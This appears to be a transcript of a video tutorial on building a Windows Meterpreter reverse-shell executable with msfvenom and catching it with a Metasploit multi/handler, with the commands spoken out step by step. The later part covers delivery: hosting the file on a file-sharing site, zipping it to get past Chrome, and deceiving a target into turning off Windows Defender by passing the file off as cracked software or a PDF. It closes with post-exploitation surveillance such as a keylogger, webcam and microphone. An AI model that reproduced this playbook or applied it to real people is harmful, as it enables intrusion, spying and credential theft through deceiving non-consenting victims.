we're going to learn how to create a Windows payload and create a listener for that Windows payload. And this will be basically a backdoored malicious exe file that can be run on Windows, right? Most programs are .exe on Windows, right? And we will create this fake exe or Windows program file and, create a listener. And then what you would do is you'd send it to the target. Target opens it up, runs it. It gives us a reverse shell. Now, I don't have a Windows computer. I have a Mac OS, MacBook Air laptop, so I can't demonstrate the part of running the file on the Windows computer for you to get the reverse shell. So that's something that you're going to have to do and practice on your own machine. If you don't want to do it on your own machine, which it doesn't put you at risk, the payload is using your IP address and a port that you specify, and it's when the target runs it, it's connecting back to your Kali Linux machine to give it that reverse connection. Okay, so it's not giving someone else or something else a connection to your computer. It's giving you a connection. So and you can Google all this. Like, first of all, we can read this. The payload we are going to create with msfvenom is a reverse TCP payload for Windows. This payload generates an exe, which then run connects, which is then run, it should say, and then connects from the victim's machine to our Metasploit handler giving us a Meterpreter session. So that's what we're going to do, step by step. Now, there's many ways to do this. This is a basic, the most basic way that you can make a Windows payload. There's multiple complex ways to do it. This payload is not going to bypass Windows Defender. So when you try to download this onto your Windows machine, this file that we're going to create, Windows Defender is going to block it, and it's just going to delete it, right? So later down the line, I will make a video showing different techniques and methods on how to obfuscate your payload to make it so it bypasses Windows Defender. But we have to start from the beginning. That's way too complex, super advanced stuff that even the most advanced pen testers are struggling with right now, is to bypass Windows Defender. So it always changes, but we will get to that point. Let's start from the beginning. So let's go ahead and make our payload, first of all. And then we will make the listener after that. So go over here, open up a terminal, right? And by the way, for step 2 that you did, there was a reason why we set up sudo and we set up the bridged adapter, right? That was so that we get a proper IP address, a static IP address attached to our machine. So if I type in ifconfig, then as you can see, I have this new IP address that says 192.168.0.40. So make sure that you have that IP address. There will be no other IP address that starts with 192.168, I think. There shouldn't be. So make sure you have that IP address. It should be under ETH0 right here, or ETH1, or something along those lines. So we're going to be using that IP address frequently. Oops, did I? Yeah, I did. Okay. Now I have to go back to get that command. Also, one thing I forgot to mention real quick, or something I forgot to read, just so you understand what's going on. So in this command right here, right, msfvenom-p Windows, the -p lets you specify which payload you want to use. In this case, we're using Windows Meterpreter reverse TCP payload. LHOST, this needs to be the attacker's IP address if you want the payload to connect back to you, which is the one I showed you in ifconfig. LPORT, as above, this port, this is the port the payload will connect on and will need to be set up in the handler. Okay, so we got that locked in. So now we just got to create the payload. And I have to change some of the information in this. Obviously, I'm going to use port. You can use really any port, but I would recommend using 8080, 443, or 8081. Sometimes certain ports get flagged and stopped from, they can get blocked sometimes. So anyways, that's my IP address, which is my local IP address, which is much different from your public IP address, which is the IP address that you would need to protect and obviously not show people. So this IP address that you're seeing under ifconfig, the one that I have right there, is not the IP address that you need to worry about somebody getting a hold of and hacking. They can't. Nobody can hack you through the local IP address. So anyways, I hit enter. Now we're going to wait for the payload to be created. Okay, so the payload is done. You're going to see this when the payload is done generating. By the way, if my voice sounds echoey and the audio sounds a little off, sorry about that. I'm having issues with my laptop, so I'll have that fixed in the upcoming videos. But I'm having a lot of bad luck right now, so bear with me. Anyways, so yeah, the payload has been made. Where you can find it is you go up here to this folder, you click on the folder, you click open folder, and it'll open up that folder, and the payload is right here. And we have it called securitytutorials.exe. So I probably, I could have changed that. You can call it whatever you want to call it. Doesn't matter. So I just took that, put it on my desktop, just dragged it and dropped it onto my desktop. So here it is right here. That is the fake exe file that is going to hack a Windows computer. Obviously, it's not obfuscated in order to bypass Windows, so you will have to first, before you download this, you have to create a handler, which is next. Number two, you have to find a way to get it onto the target machine, uploading it, doing something with it. I can show you one strategy I use. I use file bin. And from there, before you even try to download it onto your Windows computer, you have to disable lifetime protection. So you have to basically disable Windows Defender. Now, there's a bunch of videos on how to do that. You can just type into YouTube and say, how to disable Windows Defender lifetime protection. Just type that into Google. How to disable lifetime protection Windows. Okay, there's a bunch of videos. Learn how to do it. You should be familiar with it. It's something you should be able to just do. You know what I mean? It takes 2 seconds. It's super easy. So there should be no reason why you should struggle with that. Okay, so now we have to create the handler. So in order to do that, we have to type in sudo. See, this is why we set up in step 2 sudo, or else you're going to be having problems right now if you didn't follow step 2 correctly, and you won't have an IP address that starts with 192.168. And if you use a different IP address in ifconfig, then it's not going to work. So everything has to be done accordingly. So sudo msfconsole, right? You're going to hit enter, put in your password like usual. Every time you pretty much upgrade, update, install a tool, go into the tool, use the tool, you're going to have to, in most cases, you're going to have to use sudo before you do any of that. So anyways, we'll wait for this to open up. Okay, so we made the payload. We opened up msfconsole, which is this, sudo space msfconsole, right? That opened this up for us. Now what we're going to type is use space exploit /multi/handler. Make sure that every single letter, every space is exactly the same, or you're going to have errors. Things are not going to work. Everything has to be done exact. So then we're going to do set space payload space Windows slash Meterpreter slash reverse underscore TCP. Oops, see, I did that wrong and there was an error. So TCP. So that set the payload. So because we used a Windows payload, so set space payload space Windows slash Meterpreter, which is METERPRETER. Anyways, now if anything is misspelled in here, then it won't work. So now let's move to set LHOST in all capitals, LHOST 0.0.0.0, and we want to set the L port to the exact same L port, the same port that we used when we created the payload, which we used 8080. If you go back in the video, you'll see that. And then you hit run and hit enter. Now, this started the reverse TCP handler on 0.0.0.0 port 8080. Now that's listening. So now you have your file. You got your payload right there. That's what you need to get onto the target machine, and it has to be run, double-clicked, and executed. Now, obviously, because we didn't obfuscate it to bypass Windows Defender will just catch it and delete it. It won't work. So, again, you need to Google or use ChatGPT, which is what I recommend because it just answers anything that you ask it in detail and shows you how to do it and provides examples. It's Google on steroids. Beyond that, you shouldn't use Google anymore. You should use ChatGPT. Anyways, so Google how to disable Windows live time protection. I don't have Windows computer, so I can't demonstrate it to you. Later down the road, I might add another virtual machine, which with VirtualBox you can run Mac OS on it, you can run Kali Linux, you can run Windows 11, you can run anything on it. But I don't have the RAM and I don't have the space. My laptop is struggling heavily. So anyways, this is listening. All you would have to do is disable Windows Defender, which is only one switch. The only switch you need to click off is live time protection inside of Windows Defender. You can look at it, Google it, YouTube it. You will see videos of people showing you how to do it in several different ways. Do that and then download the file onto the computer and then run it. If you do that before disabling Windows Defender, it's not going to work. So one way that you can upload that file and send it to the target for them to download. Now, again, there's an element that's missing here, and it's social engineering. So this is where your craftiness, your character, your personality, your ability comes into play. You might have to socially engineer somebody and say, hey, here's that, PDF you want, or here's that, which we can make this a PDF, by the way. So when they open it on Windows, they think it's just a PDF, and it's not. It's malicious, and it gives us reverse shell. So anyways, you can just, say, hey, here's that program you wanted. It's pirated, so, I cracked it instead of paying for the full version. So Windows Defender will block it when you try to download it. So all you have to do is disable lifetime protection. Just one click, boom, that's it. Download the program, run it, and you're good to go. Boom. That's whatever you would use to try to socially engineer that individual to do something that's kind of sketchy, a little bit sketchy. Later down the road, we'll figure out how to obfuscate and payload, which is very, very difficult to do to bypass Windows Defender, but it can be done in multiple different ways. This is the most basic way to make a payload. So anyways, my computer is struggling. So yeah, so how we would get that file to the target. File bin. So just type in file bin into Google. And this is nothing but a website that allows you to upload a file, gives you a URL or a link to that file, which then you can send to the target for them to download the exe file or the payload or the backdoor. And my computer might just even crash on me the way things have been going, but anyways, so then you can just drag and drop the exe file that we created, the payload, if it wants to cooperate. Anyways, you can drop and drag it, or you can just upload it as normal. So there it is. I'm going to upload it. As you can see, it uploaded. Now what you would do is you would click download files, and then you see zip here. Now this is important because when you try to send this to the target, if you send it as just the exe file itself, or you just use that normal link, Chrome is going to block it. It's going to get blocked by Chrome now. So how you get past Chrome is you do it like this. You click on download files, then you go to zip, you right click on zip, and then you copy that specific link to that zip folder. So that way, when somebody clicks on it, it will automatically download that file like so onto their computer. From there, they need to run that file. So it's inside of a zip, so they'd have to unzip it and then double click on it and run the file on their Windows computer. And then back here, this will change right here, and it'll say Meterpreter, which means you're in. You have a shell. From there, you're going to have a new command prompt right here that says Meterpreter, and you're going to type in help and hit enter. And then it's going to show you a list of all of the commands and all of the things that you can do, like record from the mic, record from the camera, take a picture from the camera, look at the person's screen live time, turn on a keylogger so everything that they type is logged. You can use Kiwi. I'll have a whole set of commands for you to use and a plan set out of what you would do once you get onto the machine. Post-exploitation is what it's called. So then I would give you the commands and help you with a little cheat sheet on what you would do from step 1 all the way up once you've infiltrated the device, and now you want to, whatever you want to do, it just depends on you. You could type in ls, and that will list all of the files in the computer that you've just hacked into. You can type in pwd, and that will show you where you are inside of the Windows computer. It'll show you the directory, and then you'll know that you're in there. Also, when you type ls and see your files, you're going to know that you're in, right? And yeah, always type help, and it'll show you everything you need to know. If you need to educate yourself a little more, you need to do a little bit of homework, right? You need to look up post-exploitation Metasploit for Windows 10 Windows 10 post-exploitation on Metasploit. It'll give you a bunch of Google things and cheat sheets and things that you can do and cool things, whatever. You're in. That's the point. I taught you how to create a payload, create a listener, get it to the target, execute it, make sure that you turn off live time protection in Windows Defender or it won't work. And later down the road, once you get fond of this process and you want to grow, you know what I mean, I will give you the cheat sheets and the commands. Like I've given you a couple already. ls, pwd, and help is all you're really going to need to know for the beginning.
and then we'll go from there. We'll learn more from there, and whatever else you're interested in, bringing to my attention, I'll teach you how to do it. So that's how you do Windows. Unfortunately, because I don't have a Windows computer, I can't continue on. I can't execute the file, show you the Meterpreter session, which I did do in a previous video on a channel that I'll link to this video that you can watch when I did have a Windows computer laptop, which broke. Now I need to get a new one. Now my Mac is struggling too, so I have to get a new one as well. So yeah, that's it.